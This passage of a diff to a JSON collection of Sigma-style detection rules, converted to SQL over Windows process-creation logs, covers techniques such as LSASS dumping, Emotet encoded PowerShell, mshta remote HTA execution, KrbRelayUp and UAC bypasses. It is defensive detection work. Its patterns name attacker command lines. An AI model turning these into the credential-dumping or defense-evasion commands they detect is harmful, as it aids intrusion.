LIKE '%\\\\ccmcache\\\\%' ESCAPE '\\') OR ((ParentCommandLine LIKE '%\\\\Program 
Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\setup-scheduledtask.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\set-selfhealing.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\Program Files\\\\Amazon\\\\WorkSpacesConfig\\\\Scripts\\\\check-workspacehealth.ps1%' ESCAPE '\\' OR ParentCommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')) OR (CommandLine LIKE '%\\\\nessus\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_shell_spawn_susp_program.yml" + "filename": "proc_creation_win_csc_susp_parent.yml" }, { - "title": "Renamed AdFind Execution", - "id": "df55196f-f105-44d3-a675-e9dfb6cc2f2b", - "status": "test", - "description": "Detects the use of a renamed Adfind.exe. AdFind continues to be seen across majority of breaches. 
It is used to domain trust discovery to plan out subsequent steps in the attack chain.", + "title": "Potential Emotet Activity", + "id": "d02e8cf5-6099-48cf-9bfc-1eec2d0c7b18", + "status": "stable", + "description": "Detects all Emotet like process executions that are not covered by the more generic rules", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1027" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%domainlist%' ESCAPE '\\' OR CommandLine LIKE '%trustdmp%' ESCAPE '\\' OR CommandLine LIKE '%dcmodes%' ESCAPE '\\' OR CommandLine LIKE '%adinfo%' ESCAPE '\\' OR CommandLine LIKE '% dclist %' ESCAPE '\\' OR CommandLine LIKE '%computer\\_pwdnotreqd%' ESCAPE '\\' OR CommandLine LIKE '%objectcategory=%' ESCAPE '\\' OR CommandLine LIKE '%-subnets -f%' ESCAPE '\\' OR CommandLine LIKE '%name=\"Domain Admins\"%' ESCAPE '\\' OR CommandLine LIKE '%-sc u:%' ESCAPE '\\' OR CommandLine LIKE '%domainncs%' ESCAPE '\\' OR CommandLine LIKE '%dompol%' ESCAPE '\\' OR CommandLine LIKE '% oudmp %' ESCAPE '\\' OR CommandLine LIKE '%subnetdmp%' ESCAPE '\\' OR CommandLine LIKE '%gpodmp%' ESCAPE '\\' OR CommandLine LIKE '%fspdmp%' ESCAPE '\\' OR CommandLine LIKE '%users\\_noexpire%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_active%' ESCAPE '\\' OR CommandLine LIKE '%computers\\_pwdnotreqd%' ESCAPE '\\') OR Imphash IN ('bca5675746d13a1f246e2da3c2217492', '53e117a96057eaf19c41380d0e87f1c2') OR (Hashes LIKE '%IMPHASH=BCA5675746D13A1F246E2DA3C2217492%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=53E117A96057EAF19C41380D0E87F1C2%' ESCAPE '\\') OR OriginalFileName = 'AdFind.exe') AND NOT (NewProcessName LIKE '%\\\\AdFind.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = 
'4688' AND Channel = 'Security') AND (CommandLine LIKE '% -e% PAA%' ESCAPE '\\' OR CommandLine LIKE '%JABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQ%' ESCAPE '\\' OR CommandLine LIKE '%QAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUA%' ESCAPE '\\' OR CommandLine LIKE '%kAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlA%' ESCAPE '\\' OR CommandLine LIKE '%IgAoACcAKgAnACkAOwAkA%' ESCAPE '\\' OR CommandLine LIKE '%IAKAAnACoAJwApADsAJA%' ESCAPE '\\' OR CommandLine LIKE '%iACgAJwAqACcAKQA7ACQA%' ESCAPE '\\' OR CommandLine LIKE '%JABGAGwAeAByAGgAYwBmAGQ%' ESCAPE '\\' OR CommandLine LIKE '%PQAkAGUAbgB2ADoAdABlAG0AcAArACgA%' ESCAPE '\\' OR CommandLine LIKE '%0AJABlAG4AdgA6AHQAZQBtAHAAKwAoA%' ESCAPE '\\' OR CommandLine LIKE '%9ACQAZQBuAHYAOgB0AGUAbQBwACsAKA%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%fAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQ%' ESCAPE '\\' OR CommandLine LIKE '%wAIABDAG8AbgB2AGUAcgB0AFQAbwAtAEoAcwBvAG4AIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUA%' ESCAPE '\\' OR CommandLine LIKE '%8ACAAQwBvAG4AdgBlAHIAdABUAG8ALQBKAHMAbwBuACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlA%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_renamed_adfind.yml" + "filename": "proc_creation_win_malware_emotet.yml" }, { - "title": "Findstr GPP Passwords", - "id": "91a2c315-9ee6-4052-a853-6f6a8238f90d", + "title": "LSASS Memory Dumping", + "id": "ffa6861c-4461-4f59-8a41-578c39f3f23e", "status": "test", - "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. 
This value can be decrypted with gpp-decrypt.", - "author": "frack113", + "description": "Detect creation of dump files containing the memory space of lsass.exe, which contains sensitive credentials.\nIdentifies usage of Sysinternals procdump.exe to export the memory space of lsass.exe which contains sensitive credentials.\n", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community", "tags": [ "attack.credential_access", - "attack.t1552.006" + "attack.t1003.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND (CommandLine LIKE '%cpassword%' ESCAPE '\\' AND CommandLine LIKE '%\\\\sysvol\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.xml%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '%lsass%' ESCAPE '\\' AND CommandLine LIKE '%.dmp%' ESCAPE '\\') AND NOT (NewProcessName LIKE '%\\\\werfault.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_gpp_passwords.yml" + "filename": "proc_creation_win_susp_lsass_dump.yml" }, { - "title": "Remotely Hosted HTA File Executed Via Mshta.EXE", - "id": "b98d0db6-511d-45de-ad02-e82a98729620", + "title": "Python Spawning Pretty TTY on Windows", + "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", "status": "experimental", - "description": "Detects execution of the \"mshta\" utility with an argument containing the \"http\" keyword, which could indicate that an attacker is executing a remotely hosted malicious hta file", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects python spawning a pretty tty", + "author": "Nextron Systems", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218.005" + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM 
logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND (CommandLine LIKE '%http://%' ESCAPE '\\' OR CommandLine LIKE '%https://%' ESCAPE '\\' OR CommandLine LIKE '%ftp://%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%python.exe' ESCAPE '\\' OR NewProcessName LIKE '%python3.exe' ESCAPE '\\' OR NewProcessName LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_mshta_http.yml" + "filename": "proc_creation_win_python_pty_spawn.yml" }, { - "title": "Command Line Path Traversal Evasion", - "id": "1327381e-6ab0-4f38-b583-4c1b8346a56b", - "status": "experimental", - "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", - "author": "Christian Burkard (Nextron Systems)", + "title": "Potential LethalHTA Technique Execution", + "id": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", + "status": "test", + "description": "Detects potential LethalHTA technique where the \"mshta.exe\" is spwaned by an \"svchost.exe\" process", + "author": "Markus Neis", "tags": [ "attack.defense_evasion", - "attack.t1036" + "attack.t1218.005" ], "falsepositives": [ - "Google Drive", - "Citrix" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\Windows\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\..\\\\Windows\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\System32\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\..\\\\..\\\\%' ESCAPE '\\')) OR CommandLine LIKE '%.exe\\\\..\\\\%' ESCAPE '\\') AND NOT ((CommandLine LIKE '%\\\\Google\\\\Drive\\\\googledrivesync.exe\\\\..\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%\\\\Citrix\\\\Virtual Smart Card\\\\Citrix.Authentication.VirtualSmartcard.Launcher.exe\\\\..\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_commandline_path_traversal_evasion.yml" + "filename": "proc_creation_win_mshta_lethalhta_technique.yml" }, { - "title": "Potential Data Stealing Via Chromium Headless Debugging", - "id": "3e8207c5-fcd2-4ea6-9418-15d45b4890e4", - "status": "experimental", - "description": "Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "PUA - Radmin Viewer Utility Execution", + "id": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "status": "test", + "description": "Detects the execution of Radmin which can be abused by an adversary to remotely control Windows machines", + "author": "frack113", "tags": [ - "attack.credential_access", - "attack.t1185" + "attack.execution", + "attack.lateral_movement", + "attack.t1072" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%--remote-debugging-%' ESCAPE '\\' AND CommandLine LIKE '%--user-data-dir%' ESCAPE '\\' AND CommandLine LIKE '%--headless%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'Radmin Viewer' OR Product = 'Radmin Viewer' OR OriginalFileName = 'Radmin.exe'))" ], - "filename": "proc_creation_win_browsers_chromium_headless_debugging.yml" + "filename": "proc_creation_win_pua_radmin.yml" }, { - "title": "Suspicious MSDT Parent Process", - "id": "7a74da6b-ea76-47db-92cc-874ad90df734", - "status": "experimental", - "description": "Detects msdt.exe executed by a 
suspicious parent as seen in CVE-2022-30190 / Follina exploitation", - "author": "Nextron Systems", + "title": "HackTool - F-Secure C3 Load by Rundll32", + "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", + "status": "test", + "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", + "author": "Alfie Champion (ajpc500)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1218" + "attack.t1218.011" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\') AND (NewProcessName LIKE '%\\\\msdt.exe' ESCAPE '\\' OR OriginalFileName = 'msdt.exe'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" ], - "filename": "proc_creation_win_msdt_susp_parent.yml" + "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" }, { - "title": "Suspicious PowerShell IEX Execution Patterns", - "id": "09576804-7a05-458e-a817-eb718ca91f54", + "title": "HackTool - KrbRelayUp Execution", + "id": "12827a56-61a4-476a-a9cb-f3068f191073", "status": "experimental", - "description": "Detects suspicious ways to run Invoke-Execution using IEX alias", + "description": "Detects 
KrbRelayUp used to perform a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced", "author": "Florian Roth (Nextron Systems)", + "tags": [ + "attack.credential_access", + "attack.t1558.003", + "attack.lateral_movement", + "attack.t1550.003" + ], "falsepositives": [ - "Legitimate scripts that use IEX" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '% | iex;%' ESCAPE '\\' OR CommandLine LIKE '% | iex %' ESCAPE '\\' OR CommandLine LIKE '% | iex}%' ESCAPE '\\' OR CommandLine LIKE '% | IEX ;%' ESCAPE '\\' OR CommandLine LIKE '% | IEX -Error%' ESCAPE '\\' OR CommandLine LIKE '% | IEX (new%' ESCAPE '\\' OR CommandLine LIKE '%);IEX %' ESCAPE '\\') AND (CommandLine LIKE '%::FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '%.GetString([System.Convert]::%' ESCAPE '\\')) OR (CommandLine LIKE '%)|iex;$%' ESCAPE '\\' OR CommandLine LIKE '%);iex($%' ESCAPE '\\' OR CommandLine LIKE '%);iex $%' ESCAPE '\\' OR CommandLine LIKE '% | IEX | %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\KrbRelayUp.exe' ESCAPE '\\' OR OriginalFileName = 'KrbRelayUp.exe') OR (CommandLine LIKE '% relay %' ESCAPE '\\' AND CommandLine LIKE '% -Domain %' ESCAPE '\\' AND CommandLine LIKE '% -ComputerName %' ESCAPE '\\') OR (CommandLine LIKE '% krbscm %' ESCAPE '\\' AND CommandLine LIKE '% -sc %' ESCAPE '\\') OR (CommandLine LIKE '% spawn %' ESCAPE '\\' AND CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -cn %' ESCAPE '\\' AND CommandLine LIKE '% -cp %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_iex_patterns.yml" + "filename": "proc_creation_win_hktl_krbrelayup.yml" }, { - "title": "Outlook EnableUnsafeClientMailRules Setting Enabled", - 
"id": "55f0a3a1-846e-40eb-8273-677371b8d912", + "title": "File Download with Headless Browser", + "id": "0e8cfe08-02c9-4815-a2f8-0d157b7ed33e", "status": "test", - "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", - "author": "Markus Neis, Nasreddine Bencherchali (Nextron Systems)", + "description": "This is an unusual method to download files. It starts a browser headless and downloads a file from a location. This can be used by threat actors to download files.", + "author": "Sreeman, Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059", - "attack.t1202" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\Outlook\\\\Security\\\\EnableUnsafeClientMailRules%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\msedge.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\chrome.exe' ESCAPE '\\') AND CommandLine LIKE '%--headless%' ESCAPE '\\' AND CommandLine LIKE '%dump-dom%' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')" ], - "filename": "proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml" + "filename": "proc_creation_win_browsers_chromium_headless_file_download.yml" }, { - "title": "Suspicious Registry Modification From ADS Via Regini.EXE", - "id": "77946e79-97f1-45a2-84b4-f37b5c0d8682", + "title": "Tamper Windows Defender Remove-MpPreference", + "id": "07e3cb2c-0608-410d-be4b-1511cb1a0448", "status": "experimental", - "description": "Detects the import of an alternate data stream with regini.exe, regini.exe can be used to modify registry keys.", - "author": "Eli Salem, Sander Wiebing, oscd.community", + "description": "Detects attempts to remove windows defender configuration 
using the 'MpPreference' cmdlet", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.t1112", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate PowerShell scripts" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\regini.exe' ESCAPE '\\' OR OriginalFileName = 'REGINI.EXE') AND CommandLine REGEXP ':[^ \\\\]')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Remove-MpPreference%' ESCAPE '\\' AND (CommandLine LIKE '%-ControlledFolderAccessProtectedFolders %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Ids %' ESCAPE '\\' OR CommandLine LIKE '%-AttackSurfaceReductionRules\\_Actions %' ESCAPE '\\' OR CommandLine LIKE '%-CheckForSignaturesBeforeRunningScan %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_regini_ads.yml" + "filename": "proc_creation_win_powershell_tamper_defender_remove_mppreference.yml" }, { - "title": "UAC Bypass Using DismHost", - "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", + "title": "UAC Bypass WSReset", + "id": "89a9a0e0-f61a-42e5-8957-b1479565a658", "status": "test", - "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "description": "Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config", "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", 
@@ -9499,798 +9243,736 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wsreset.exe' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_uac_bypass_dismhost.yml" + "filename": "proc_creation_win_uac_bypass_wsreset_integrity_level.yml" }, { - "title": "Potential PowerShell Obfuscation Via Reversed Commands", - "id": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4", - "status": "test", - "description": "Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers", - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", + "title": "PUA - Process Hacker / System Informer Execution", + "id": "811e0002-b13b-4a15-9d00-a613fce66e42", + "status": "experimental", + "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Sometimes used by developers or system administrators for debugging purposes" + ], + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\ProcessHacker\\_%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\SystemInformer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ProcessHacker.exe' ESCAPE '\\') OR OriginalFileName IN ('ProcessHacker.exe', 'Process Hacker', 'SystemInformer.exe') OR Description IN ('Process Hacker', 'System Informer') OR Product = 'Process Hacker' OR 
(Hashes LIKE '%MD5=68F9B52895F4D34E74112F3129B3B00D%' ESCAPE '\\' OR Hashes LIKE '%SHA1=C5E2018BF7C0F314FED4FD7FE7E69FA2E648359E%' ESCAPE '\\' OR Hashes LIKE '%SHA256=D4A0FE56316A2C45B9BA9AC1005363309A3EDC7ACF9E4DF64D326A0FF273E80F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=04DE0AD9C37EB7BD52043D2ECAC958DF%' ESCAPE '\\' OR Hashes LIKE '%MD5=B365AF317AE730A67C936F21432B9C71%' ESCAPE '\\' OR Hashes LIKE '%SHA1=A0BDFAC3CE1880B32FF9B696458327CE352E3B1D%' ESCAPE '\\' OR Hashes LIKE '%SHA256=BD2C2CF0631D881ED382817AFCCE2B093F4E412FFB170A719E2762F250ABFEA4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3695333C60DEDECDCAFF1590409AA462%' ESCAPE '\\') OR md5 IN ('68f9b52895f4d34e74112f3129b3b00d', 'b365af317ae730a67c936f21432b9c71') OR sha1 IN ('c5e2018bf7c0f314fed4fd7fe7e69fa2e648359e', 'a0bdfac3ce1880b32ff9b696458327ce352e3b1d') OR sha256 IN ('d4a0fe56316a2c45b9ba9ac1005363309a3edc7acf9e4df64d326a0ff273e80f', 'bd2c2cf0631d881ed382817afcce2b093f4e412ffb170a719e2762f250abfea4') OR Imphash IN ('04de0ad9c37eb7bd52043d2ecac958df', '3695333c60dedecdcaff1590409aa462')))" + ], + "filename": "proc_creation_win_pua_process_hacker.yml" + }, + { + "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", + "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "status": "experimental", + "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.lateral_movement", + "attack.t1021.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%hctac%' ESCAPE '\\' OR CommandLine LIKE '%kaerb%' ESCAPE '\\' OR 
CommandLine LIKE '%dnammoc%' ESCAPE '\\' OR CommandLine LIKE '%ekovn%' ESCAPE '\\' OR CommandLine LIKE '%eliFd%' ESCAPE '\\' OR CommandLine LIKE '%rahc%' ESCAPE '\\' OR CommandLine LIKE '%etirw%' ESCAPE '\\' OR CommandLine LIKE '%golon%' ESCAPE '\\' OR CommandLine LIKE '%tninon%' ESCAPE '\\' OR CommandLine LIKE '%eddih%' ESCAPE '\\' OR CommandLine LIKE '%tpircS%' ESCAPE '\\' OR CommandLine LIKE '%ssecorp%' ESCAPE '\\' OR CommandLine LIKE '%llehsrewop%' ESCAPE '\\' OR CommandLine LIKE '%esnopser%' ESCAPE '\\' OR CommandLine LIKE '%daolnwod%' ESCAPE '\\' OR CommandLine LIKE '%tneilCbeW%' ESCAPE '\\' OR CommandLine LIKE '%tneilc%' ESCAPE '\\' OR CommandLine LIKE '%ptth%' ESCAPE '\\' OR CommandLine LIKE '%elifotevas%' ESCAPE '\\' OR CommandLine LIKE '%46esab%' ESCAPE '\\' OR CommandLine LIKE '%htaPpmeTteG%' ESCAPE '\\' OR CommandLine LIKE '%tcejbO%' ESCAPE '\\' OR CommandLine LIKE '%maerts%' ESCAPE '\\' OR CommandLine LIKE '%hcaerof%' ESCAPE '\\' OR CommandLine LIKE '%retupmoc%' ESCAPE '\\')) AND NOT ((ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%-EncodedCommand%' ESCAPE '\\' AND CommandLine LIKE '%rahc%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml" + "filename": "proc_creation_win_net_use_mount_internet_share.yml" }, { - "title": "UNC2452 PowerShell Pattern", - "id": "b7155193-8a81-4d8f-805d-88de864ca50c", - "status": "test", - "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious Schtasks Schedule Types", 
+ "id": "24c8392b-aa3c-46b7-a545-43f71657fe98", + "status": "experimental", + "description": "Detects scheduled task creations or modification on a suspicious schedule type", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.001", - "attack.t1047" + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Legitimate processes that run at logon. Filter according to your environment" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Invoke-WMIMethod win32\\_process -name create -argumentlist%' ESCAPE '\\' AND CommandLine LIKE '%rundll32 c:\\\\windows%' ESCAPE '\\') OR (CommandLine LIKE '%wmic /node:%' ESCAPE '\\' AND CommandLine LIKE '%process call create \"rundll32 c:\\\\windows%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_apt_unc2452_ps.yml" + "filename": "proc_creation_win_schtasks_schedule_type.yml" }, { - "title": "Schtasks From Suspicious Folders", - "id": "8a8379b8-780b-4dbf-b1e9-31c8d112fefb", + "title": "Suspicious Manipulation Of Default Accounts Via Net.EXE", + "id": "5b768e71-86f2-4879-b448-81061cbae951", "status": "experimental", - "description": "Detects scheduled task creations that have suspicious action command and folder combinations", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. 
For example 'enable' or 'disable' accounts or change the password...etc", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1053.005" + "attack.collection", + "attack.t1560.001" ], "falsepositives": [ - "Unknown" + "Some false positives could occur with the admin or guest account. It depends on the scripts being used by the admins in your env. If you experience a lot of FP you could reduce the level to medium" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND CommandLine LIKE '% /create %' ESCAPE '\\' AND (CommandLine LIKE '%powershell%' ESCAPE '\\' OR CommandLine LIKE '%pwsh%' ESCAPE '\\' OR CommandLine LIKE '%cmd /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\') 